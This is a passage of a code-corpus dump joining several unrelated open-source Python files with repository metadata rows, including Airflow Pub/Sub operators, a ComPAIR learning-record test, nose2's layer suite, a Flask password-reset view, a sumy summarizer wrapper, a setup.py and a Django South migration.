# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.subscription = subscription
self.fail_if_not_exists = fail_if_not_exists
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.retry = retry
self.timeout = timeout
self.metadata = metadata
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Deleting subscription %s", self.subscription)
hook.delete_subscription(
project_id=self.project_id,
subscription=self.subscription,
fail_if_not_exists=self.fail_if_not_exists,
retry=self.retry,
timeout=self.timeout,
metadata=self.metadata,
)
self.log.info("Deleted subscription %s", self.subscription)
class PubSubPublishMessageOperator(BaseOperator):
"""Publish messages to a PubSub topic.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:PubSubPublishMessageOperator`
Each Task publishes all provided messages to the same topic
in a single Google Cloud project. If the topic does not exist, this
task will fail. ::
m1 = {'data': b'Hello, World!',
'attributes': {'type': 'greeting'}
}
m2 = {'data': b'Knock, knock'}
m3 = {'attributes': {'foo': ''}}
        t1 = PubSubPublishOperator(
            project='my-project', topic='my_topic',
            messages=[m1, m2, m3],
            dag=dag)
    ``project``, ``topic``, and ``messages`` are templated so you can use
    variables in them.
:param project_id: Optional, the Google Cloud project ID in which to work (templated).
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:param topic: the topic to which to publish. Do not include the
full topic path. In other words, instead of
``projects/{project}/topics/{topic}``, provide only
``{topic}``. (templated)
:type topic: str
:param messages: a list of messages to be published to the
topic. Each message is a dict with one or more of the
following keys-value mappings:
* 'data': a bytestring (utf-8 encoded)
* 'attributes': {'key1': 'value1', ...}
Each message must contain at least a non-empty 'data' value
or an attribute dict with at least one key (templated). See
https://cloud.google.com/pubsub/docs/reference/rest/v1/PubsubMessage
:type messages: list
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param project: (Deprecated) the Google Cloud project ID where the topic will be created
:type project: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'topic',
'messages',
'impersonation_chain',
]
ui_color = '#0273d4'
def __init__(
self,
*,
topic: str,
messages: List,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
project: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
# To preserve backward compatibility
# TODO: remove one day
if project:
warnings.warn(
"The project parameter has been deprecated. You should pass the project_id parameter.",
DeprecationWarning,
stacklevel=2,
)
project_id = project
super().__init__(**kwargs)
self.project_id = project_id
self.topic = topic
self.messages = messages
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info("Publishing to topic %s", self.topic)
hook.publish(project_id=self.project_id, topic=self.topic, messages=self.messages)
self.log.info("Published to topic %s", self.topic)
class PubSubPullOperator(BaseOperator):
"""Pulls messages from a PubSub subscription and passes them through XCom.
    If the queue is empty, returns an empty list and never waits for messages.
    If you do need to wait, please use
    :class:`airflow.providers.google.cloud.sensors.pubsub.PubSubPullSensor`
    instead.
    .. seealso::
        For more information on how to use this operator, take a look at the guide:
        :ref:`howto/operator:PubSubPullOperator`
    This operator will pull up to ``max_messages`` messages from the
    specified PubSub subscription. The pulled messages are returned from the
    operator's ``execute`` method and passed through XCom to downstream tasks.
If ``ack_messages`` is set to True, messages will be immediately
acknowledged before being returned, otherwise, downstream tasks will be
responsible for acknowledging them.
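    A minimal usage sketch (the project and subscription names are
    illustrative)::
        t1 = PubSubPullOperator(
            task_id='pull_messages',
            project_id='my-project',
            subscription='my-subscription',
            max_messages=10,
            ack_messages=True,
            dag=dag)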
    ``project_id`` and ``subscription`` are templated so you can use
    variables in them.
    :param project_id: the Google Cloud project ID for the subscription (templated)
    :type project_id: str
:param subscription: the Pub/Sub subscription name. Do not include the
full subscription path.
:type subscription: str
:param max_messages: The maximum number of messages to retrieve per
PubSub pull request
:type max_messages: int
:param ack_messages: If True, each message will be acknowledged
immediately rather than by any downstream tasks
:type ack_messages: bool
:param gcp_conn_id: The connection ID to use connecting to
Google Cloud.
:type gcp_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param messages_callback: (Optional) Callback to process received messages.
        Its return value will be saved to XCom.
If you are pulling large messages, you probably want to provide a custom callback.
If not provided, the default implementation will convert `ReceivedMessage` objects
into JSON-serializable dicts using `google.protobuf.json_format.MessageToDict` function.
:type messages_callback: Optional[Callable[[List[ReceivedMessage], Dict[str, Any]], Any]]
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = [
'project_id',
'subscription',
'impersonation_chain',
]
def __init__(
self,
*,
project_id: str,
subscription: str,
max_messages: int = 5,
ack_messages: bool = False,
messages_callback: Optional[Callable[[List[ReceivedMessage], Dict[str, Any]], Any]] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.project_id = project_id
self.subscription = subscription
self.max_messages = max_messages
self.ack_messages = ack_messages
self.messages_callback = messages_callback
self.impersonation_chain = impersonation_chain
def execute(self, context) -> list:
hook = PubSubHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
pulled_messages = hook.pull(
project_id=self.project_id,
subscription=self.subscription,
max_messages=self.max_messages,
return_immediately=True,
)
handle_messages = self.messages_callback or self._default_message_callback
ret = handle_messages(pulled_messages, context)
if pulled_messages and self.ack_messages:
hook.acknowledge(
project_id=self.project_id,
subscription=self.subscription,
messages=pulled_messages,
)
return ret
def _default_message_callback(
self,
pulled_messages: List[ReceivedMessage],
context: Dict[str, Any],
) -> list:
"""
This method can be overridden by subclasses or by `messages_callback` constructor argument.
This default implementation converts `ReceivedMessage` objects into JSON-serializable dicts.
:param pulled_messages: messages received from the topic.
:type pulled_messages: List[ReceivedMessage]
:param context: same as in `execute`
:return: value to be saved to XCom.
"""
messages_json = [ReceivedMessage.to_dict(m) for m in pulled_messages]
return messages_json
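# --- Hedged usage sketch ------------------------------------------------------
# A custom ``messages_callback`` for the operator above; the function keeps
# only the raw payload bytes of each pulled message.  The function name and
# the commented task below (task id, project, subscription) are illustrative
# assumptions, not part of this module's API.
def _example_data_only_callback(pulled_messages, context):
    """Return just the payload bytes of each pulled ReceivedMessage."""
    return [m.message.data for m in pulled_messages]
#   pull_task = PubSubPullOperator(
#       task_id="pull-messages",
#       project_id="example-project",
#       subscription="example-subscription",
#       messages_callback=_example_data_only_callback,
#       ack_messages=True,
#   )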
|
apache-2.0
| 2,101,356,312,022,905,300 | 42.058824 | 103 | 0.64576 | false |
ubc/compair
|
compair/tests/learning_records/test_assignment_events.py
|
1
|
11445
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import pytz
from data.fixtures.test_data import SimpleAssignmentTestData, LTITestData
from compair.tests.test_compair import ComPAIRLearningRecordTestCase
from compair.core import db
from flask_login import current_app
from compair.learning_records.capture_events import on_assignment_create, \
on_assignment_modified, on_assignment_delete
class AssignmentLearningRecordTests(ComPAIRLearningRecordTestCase):
def setUp(self):
super(ComPAIRLearningRecordTestCase, self).setUp()
self.data = SimpleAssignmentTestData()
self.lti_data = LTITestData()
self.user = self.data.authorized_student
self.setup_session_data(self.user)
self.course = self.data.main_course
self.lti_context = self.lti_data.create_context(
self.lti_data.lti_consumer,
compair_course_id=self.course.id,
lis_course_offering_sourcedid="sis_course_id",
lis_course_section_sourcedid="sis_section_id",
)
self.assignment = self.data.assignments[0]
self.expected_caliper_course = {
'academicSession': self.course.term,
'dateCreated': self.course.created.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'dateModified': self.course.modified.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'id': "https://localhost:8888/app/course/"+self.course.uuid,
'name': self.course.name,
'type': 'CourseOffering',
'otherIdentifiers': [{
'identifier': self.lti_context.context_id,
'identifierType': 'LtiContextId',
'type': 'SystemIdentifier',
'extensions': {
'lis_course_offering_sourcedid': 'sis_course_id',
'lis_course_section_sourcedid': 'sis_section_id',
'oauth_consumer_key': self.lti_data.lti_consumer.oauth_consumer_key,
},
}]
}
self.expected_caliper_assignment = {
'name': self.assignment.name,
'type': 'Assessment',
'dateCreated': self.assignment.created.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'dateModified': self.assignment.modified.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'dateToStartOn': self.assignment.answer_start.replace(tzinfo=pytz.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z',
'description': self.assignment.description,
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid,
'isPartOf': self.expected_caliper_course,
'items': [{
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/question",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/comparison/question/1",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/1",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/2",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/comparison/question/2",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/3",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/4",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/comparison/question/3",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/5",
'type': 'AssessmentItem'
}, {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid+"/evaluation/question/6",
'type': 'AssessmentItem'
}],
}
self.expected_xapi_course = {
'id': "https://localhost:8888/app/course/"+self.course.uuid,
'definition': {
'type': 'http://adlnet.gov/expapi/activities/course',
'name': {'en-US': self.course.name}
},
'objectType': 'Activity'
}
self.expected_xapi_assignment = {
'id': "https://localhost:8888/app/course/"+self.course.uuid+"/assignment/"+self.assignment.uuid,
'definition': {
'type': 'http://adlnet.gov/expapi/activities/assessment',
'name': {'en-US': self.assignment.name},
'description': {'en-US': self.assignment.description},
},
'objectType': 'Activity'
}
def test_on_assignment_create(self):
on_assignment_create.send(
current_app._get_current_object(),
event_name=on_assignment_create.name,
user=self.user,
assignment=self.assignment
)
events = self.get_and_clear_caliper_event_log()
expected_caliper_event = {
'action': 'Created',
'profile': 'ResourceManagementProfile',
'actor': self.get_compair_caliper_actor(self.user),
'membership': self.get_caliper_membership(self.course, self.user, self.lti_context),
'object': self.expected_caliper_assignment,
'session': self.get_caliper_session(self.get_compair_caliper_actor(self.user)),
'type': 'ResourceManagementEvent'
}
self.assertEqual(len(events), 1)
self.assertEqual(events[0], expected_caliper_event)
statements = self.get_and_clear_xapi_statement_log()
expected_xapi_statement = {
"actor": self.get_compair_xapi_actor(self.user),
"verb": {
'id': 'http://activitystrea.ms/schema/1.0/author',
'display': {'en-US': 'authored'}
},
"object": self.expected_xapi_assignment,
"context": {
'contextActivities': {
'parent': [self.expected_xapi_course],
'grouping': []
},
'extensions': {
'http://id.tincanapi.com/extension/browser-info': {},
'http://id.tincanapi.com/extension/session-info': self.get_xapi_session_info(),
'sis_courses': [{
'id': 'sis_course_id',
'section_ids': ['sis_section_id']
}]
}
}
}
self.assertEqual(len(statements), 1)
self.assertEqual(statements[0], expected_xapi_statement)
def test_on_assignment_modified(self):
on_assignment_modified.send(
current_app._get_current_object(),
event_name=on_assignment_modified.name,
user=self.user,
assignment=self.assignment
)
events = self.get_and_clear_caliper_event_log()
expected_caliper_event = {
'action': 'Modified',
'profile': 'ResourceManagementProfile',
'actor': self.get_compair_caliper_actor(self.user),
'membership': self.get_caliper_membership(self.course, self.user, self.lti_context),
'object': self.expected_caliper_assignment,
'session': self.get_caliper_session(self.get_compair_caliper_actor(self.user)),
'type': 'ResourceManagementEvent'
}
self.assertEqual(len(events), 1)
self.assertEqual(events[0], expected_caliper_event)
statements = self.get_and_clear_xapi_statement_log()
expected_xapi_statement = {
"actor": self.get_compair_xapi_actor(self.user),
"verb": {
'id': 'http://activitystrea.ms/schema/1.0/update',
'display': {'en-US': 'updated'}
},
"object": self.expected_xapi_assignment,
"context": {
'contextActivities': {
'parent': [self.expected_xapi_course],
'grouping': []
},
'extensions': {
'http://id.tincanapi.com/extension/browser-info': {},
'http://id.tincanapi.com/extension/session-info': self.get_xapi_session_info(),
'sis_courses': [{
'id': 'sis_course_id',
'section_ids': ['sis_section_id']
}]
}
}
}
self.assertEqual(len(statements), 1)
self.assertEqual(statements[0], expected_xapi_statement)
def test_on_assignment_delete(self):
on_assignment_delete.send(
current_app._get_current_object(),
event_name=on_assignment_delete.name,
user=self.user,
assignment=self.assignment
)
events = self.get_and_clear_caliper_event_log()
expected_caliper_event = {
'action': 'Archived',
'profile': 'ResourceManagementProfile',
'actor': self.get_compair_caliper_actor(self.user),
'membership': self.get_caliper_membership(self.course, self.user, self.lti_context),
'object': self.expected_caliper_assignment,
'session': self.get_caliper_session(self.get_compair_caliper_actor(self.user)),
'type': 'ResourceManagementEvent'
}
self.assertEqual(len(events), 1)
self.assertEqual(events[0], expected_caliper_event)
statements = self.get_and_clear_xapi_statement_log()
expected_xapi_statement = {
"actor": self.get_compair_xapi_actor(self.user),
"verb": {
'id': 'https://w3id.org/xapi/dod-isd/verbs/archived',
'display': {'en-US': 'archived'}
},
"object": self.expected_xapi_assignment,
"context": {
'contextActivities': {
'parent': [self.expected_xapi_course],
'grouping': []
},
'extensions': {
'http://id.tincanapi.com/extension/browser-info': {},
'http://id.tincanapi.com/extension/session-info': self.get_xapi_session_info(),
'sis_courses': [{
'id': 'sis_course_id',
'section_ids': ['sis_section_id']
}]
}
}
}
self.assertEqual(len(statements), 1)
self.assertEqual(statements[0], expected_xapi_statement)
|
gpl-3.0
| 5,911,816,738,190,630,000 | 43.019231 | 137 | 0.54574 | false |
usc-isi-i2/WEDC
|
spark_dependencies/python_lib/nose2/suite.py
|
1
|
3721
|
import sys
import inspect
import logging
from nose2 import util
from nose2.compat import unittest
log = logging.getLogger(__name__)
__unittest = True
#
# Layer suite class
#
class LayerSuite(unittest.BaseTestSuite):
def __init__(self, tests=(), layer=None):
super(LayerSuite, self).__init__(tests)
self.layer = layer
self.wasSetup = False
def run(self, result):
if not self._safeMethodCall(self.setUp, result):
return
try:
for test in self:
if result.shouldStop:
break
self._safeMethodCall(self.setUpTest, result, test)
try:
test(result)
finally:
self._safeMethodCall(self.tearDownTest, result, test)
finally:
if self.wasSetup:
self._safeMethodCall(self.tearDown, result)
def setUp(self):
if self.layer is None:
return
setup = self._getBoundClassmethod(self.layer, 'setUp')
if setup:
setup()
self.wasSetup = True
def setUpTest(self, test):
# FIXME hook call
if self.layer is None:
return
# skip suites, to ensure test setup only runs once around each test
# even for sub-layer suites inside this suite.
try:
iter(test)
except TypeError:
# ok, not a suite
pass
else:
# suite-like enough for skipping
return
if getattr(test, '_layer_wasSetUp', False):
return
self._allLayers(test, 'testSetUp')
test._layer_wasSetUp = True
def tearDownTest(self, test):
# FIXME hook call
if self.layer is None:
return
if not getattr(test, '_layer_wasSetUp', None):
return
self._allLayers(test, 'testTearDown', reverse=True)
delattr(test, '_layer_wasSetUp')
def tearDown(self):
# FIXME hook call
if self.layer is None:
return
teardown = self._getBoundClassmethod(self.layer, 'tearDown')
if teardown:
teardown()
def _safeMethodCall(self, method, result, *args):
try:
method(*args)
return True
except KeyboardInterrupt:
raise
except:
result.addError(self, sys.exc_info())
return False
def _allLayers(self, test, method, reverse=False):
done = set()
all_lys = util.ancestry(self.layer)
if reverse:
all_lys = [reversed(lys) for lys in reversed(all_lys)]
for lys in all_lys:
for layer in lys:
if layer in done:
continue
self._inLayer(layer, test, method)
done.add(layer)
def _inLayer(self, layer, test, method):
meth = self._getBoundClassmethod(layer, method)
if meth:
args, _, _, _ = inspect.getargspec(meth)
if len(args) > 1:
meth(test)
else:
meth()
def _getBoundClassmethod(self, cls, method):
"""
Use instead of :func:`getattr` to get only classmethods explicitly defined
on ``cls`` (not methods inherited from ancestors)
"""
descriptor = cls.__dict__.get(method, None)
if descriptor:
if not isinstance(descriptor, classmethod):
raise TypeError(
'The %s method on a layer must be a classmethod.' % method)
bound_method = descriptor.__get__(None, cls)
return bound_method
else:
return None
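# --- Hedged illustration --------------------------------------------------
# A minimal layer showing the classmethod contract that _getBoundClassmethod
# enforces: layer fixtures must be classmethods defined directly on the layer
# class, otherwise a TypeError is raised.  The layer name and the shared
# resource are made up for this sketch.
class _ExampleLayer(object):
    @classmethod
    def setUp(cls):
        # runs once, before any test that belongs to this layer
        cls.shared_resource = object()
    @classmethod
    def tearDown(cls):
        # runs once, after the last test that belongs to this layer
        cls.shared_resource = None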
|
apache-2.0
| 8,640,215,469,874,628,000 | 27.623077 | 82 | 0.536415 | false |
alphagov/notifications-admin
|
app/main/views/new_password.py
|
1
|
2001
|
import json
from flask import (
current_app,
flash,
redirect,
render_template,
request,
session,
url_for,
)
from itsdangerous import SignatureExpired
from notifications_utils.url_safe_token import check_token
from app.main import main
from app.main.forms import NewPasswordForm
from app.models.user import User
from app.utils.login import log_in_user
@main.route('/new-password/<path:token>', methods=['GET', 'POST'])
def new_password(token):
try:
token_data = check_token(token, current_app.config['SECRET_KEY'], current_app.config['DANGEROUS_SALT'],
current_app.config['EMAIL_EXPIRY_SECONDS'])
except SignatureExpired:
flash('The link in the email we sent you has expired. Enter your email address to resend.')
return redirect(url_for('.forgot_password'))
email_address = json.loads(token_data)['email']
user = User.from_email_address(email_address)
if user.password_changed_more_recently_than(json.loads(token_data)['created_at']):
flash('The link in the email has already been used')
return redirect(url_for('main.index'))
form = NewPasswordForm()
if form.validate_on_submit():
user.reset_failed_login_count()
session['user_details'] = {
'id': user.id,
'email': user.email_address,
'password': form.new_password.data}
if user.email_auth:
# they've just clicked an email link, so have done an email auth journey anyway. Just log them in.
return log_in_user(user.id)
elif user.webauthn_auth:
return redirect(url_for('main.two_factor_webauthn', next=request.args.get('next')))
else:
# send user a 2fa sms code
user.send_verify_code()
return redirect(url_for('main.two_factor_sms', next=request.args.get('next')))
else:
return render_template('views/new-password.html', token=token, form=form, user=user)
|
mit
| -857,660,782,628,308,500 | 36.055556 | 111 | 0.648176 | false |
yochow/autotest
|
client/bin/harness_unittest.py
|
1
|
1129
|
#!/usr/bin/python
import unittest
import common
import harness, harness_standalone, harness_ABAT
from autotest_lib.client.common_lib.test_utils import mock
class harness_unittest(unittest.TestCase):
def setUp(self):
self.god = mock.mock_god()
def tearDown(self):
self.god.unstub_all()
def test_select_none(self):
job = object()
self.god.stub_class(harness_standalone, "harness_standalone")
harness_standalone.harness_standalone.expect_new(job)
harness.select(None, job)
self.god.check_playback()
def test_select_standalone(self):
job = object()
self.god.stub_class(harness_standalone, "harness_standalone")
harness_standalone.harness_standalone.expect_new(job)
harness.select('standalone', job)
self.god.check_playback()
def test_select_ABAT(self):
job = object()
self.god.stub_class(harness_ABAT, "harness_ABAT")
harness_ABAT.harness_ABAT.expect_new(job)
harness.select('ABAT', job)
self.god.check_playback()
if __name__ == "__main__":
unittest.main()
|
gpl-2.0
| -4,472,820,272,422,862,000 | 24.088889 | 69 | 0.649247 | false |
harigov/newsalyzer
|
shared/summarizer.py
|
1
|
1055
|
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lsa import LsaSummarizer as Summarizer
from sumy.nlp.stemmers import Stemmer
from sumy.utils import get_stop_words
# summarizer requires this to work
import nltk
nltk.download('punkt')
class ArticleSummarizer(object):
def __init__(self):
self._language = "english"
self._max_sentence_count = 2
def summarize(self, text):
try:
parser = PlaintextParser.from_string(text, Tokenizer(self._language))
stemmer = Stemmer(self._language)
summarizer = Summarizer(stemmer)
summarizer.stop_words = get_stop_words(self._language)
output = ''
for sentence in summarizer(parser.document, self._max_sentence_count):
output += str(sentence)
return output
        except Exception:
return ''
if __name__ == "__main__":
text = ""
summarizer = ArticleSummarizer()
print summarizer.summarize(text)
|
mit
| 8,104,878,361,753,222,000 | 32 | 82 | 0.653081 | false |
crflynn/fbm
|
setup.py
|
1
|
1318
|
"""Setup."""
import io
from os import path
from setuptools import setup
here = path.abspath(path.dirname(__file__))
# io.open for py27
with io.open(path.join(here, "README.rst"), encoding="utf-8") as f:
long_description = f.read()
# import __version__ attributes
about = {}
with open(path.join(here, "fbm", "__version__.py")) as f:
exec(f.read(), about)
setup(
name=about["__title__"],
version=about["__version__"],
description=about["__description__"],
long_description=long_description,
url=about["__url__"],
author=about["__author__"],
author_email=about["__author_email__"],
license=about["__license__"],
packages=["fbm"],
zip_safe=False,
install_requires=["numpy"],
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Software Development :: Libraries :: Python Modules",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: Implementation :: CPython",
],
include_package_data=True,
)
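# Hedged usage note: with this configuration the package builds and installs
# in the usual way, e.g.
#   pip install .
#   python setup.py sdist bdist_wheel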
|
mit
| 2,899,985,746,063,158,300 | 27.652174 | 71 | 0.60698 | false |
assamite/TwatBot
|
tweets/migrations/0008_auto__add_urltweetimage.py
|
1
|
10052
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'URLTweetImage'
db.create_table(u'tweets_urltweetimage', (
(u'tweetimage_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['tweets.TweetImage'], unique=True, primary_key=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
))
db.send_create_signal(u'tweets', ['URLTweetImage'])
def backwards(self, orm):
# Deleting model 'URLTweetImage'
db.delete_table(u'tweets_urltweetimage')
models = {
u'tweets.articletweet': {
'Meta': {'ordering': "['-tweeted']", 'object_name': 'ArticleTweet', '_ormbases': [u'tweets.Tweet']},
'article': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'image': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.FlickrTweetImage']"}),
u'tweet_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['tweets.Tweet']", 'unique': 'True', 'primary_key': 'True'})
},
u'tweets.bracketedcolorbigram': {
'Meta': {'ordering': "['-f']", 'unique_together': "(('start_bracket', 'w1', 'w2', 'end_bracket'),)", 'object_name': 'BracketedColorBigram'},
'end_bracket': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_bracket': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.color': {
'Meta': {'unique_together': "(('rgb_r', 'rgb_g', 'rgb_b'),)", 'object_name': 'Color'},
'a': ('django.db.models.fields.FloatField', [], {}),
'b': ('django.db.models.fields.FloatField', [], {}),
'hex': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '8'}),
'html': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '7'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'l': ('django.db.models.fields.FloatField', [], {}),
'rgb_b': ('django.db.models.fields.IntegerField', [], {}),
'rgb_g': ('django.db.models.fields.IntegerField', [], {}),
'rgb_r': ('django.db.models.fields.IntegerField', [], {})
},
u'tweets.colormap': {
'Meta': {'object_name': 'ColorMap'},
'base_color': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}),
'color': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.Color']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stereotype': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.colorunigram': {
'Meta': {'ordering': "['-f']", 'object_name': 'ColorUnigram'},
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'solid_compound': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'tweets.colorunigramsplit': {
'Meta': {'ordering': "['w1', 'w2']", 'unique_together': "(('w1', 'w2'),)", 'object_name': 'ColorUnigramSplit'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.ColorUnigram']"}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.everycolorbottweet': {
'Meta': {'ordering': "['-added', 'color', 'url', 'tweeted']", 'object_name': 'EveryColorBotTweet'},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}),
'color': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.Color']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tweet_id': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'tweeted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'url': ('django.db.models.fields.URLField', [], {'unique': 'True', 'max_length': '200'})
},
u'tweets.flickrtweetimage': {
'Meta': {'object_name': 'FlickrTweetImage', '_ormbases': [u'tweets.TweetImage']},
'description': ('django.db.models.fields.TextField', [], {'max_length': '20000'}),
'flickr_farm': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_id': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_secret': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_server': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_user_id': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'flickr_user_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
u'tweetimage_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['tweets.TweetImage']", 'unique': 'True', 'primary_key': 'True'})
},
u'tweets.pluralcolorbigram': {
'Meta': {'ordering': "['-f']", 'unique_together': "(('w1', 'w2', 'singular'),)", 'object_name': 'PluralColorBigram'},
'f': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'singular': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}),
'w1': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'w2': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'tweets.retweet': {
'Meta': {'ordering': "['-retweeted']", 'object_name': 'ReTweet'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'retweeted': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'screen_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'tweet': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['tweets.Tweet']"}),
'tweet_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'})
},
u'tweets.tweet': {
'Meta': {'ordering': "['-tweeted']", 'object_name': 'Tweet'},
